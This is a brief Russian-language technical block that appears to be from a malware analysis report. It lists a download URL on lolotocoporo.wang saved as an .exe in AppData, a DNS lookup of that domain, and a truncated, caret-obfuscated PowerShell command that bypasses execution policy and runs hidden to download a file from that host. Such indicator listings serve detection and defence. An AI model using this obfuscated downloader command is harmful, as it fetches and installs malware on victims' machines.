Техническая информация
- http://lolotocoporo.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWErShe^ll.E^x^E^ ^-EXeC^Ut^I^ON^pO^LiCy BypA^Ss -no^Pr^ofiL^e -^W^in^dOW^stylE^ H^I^d^DeN^ (^nE^w-oBJEC^T^ S^Ystem^.NeT.w^Ebc^l^iE^Nt).^DOwn^l^OA^dfiLe^('http://lolotocopor...
- DNS ASK lo####coporo.wang
- '<SYSTEM32>\cmd.exe' /c "pOWErShe^ll.E^x^E^ ^-EXeC^Ut^I^ON^pO^LiCy BypA^Ss -no^Pr^ofiL^e -^W^in^dOW^stylE^ H^I^d^DeN^ (^nE^w-oBJEC^T^ S^Ystem^.NeT.w^Ebc^l^iE^Nt).^DOwn^l^OA^dfiLe^('http://lolotocopor...' (со скрытым окном)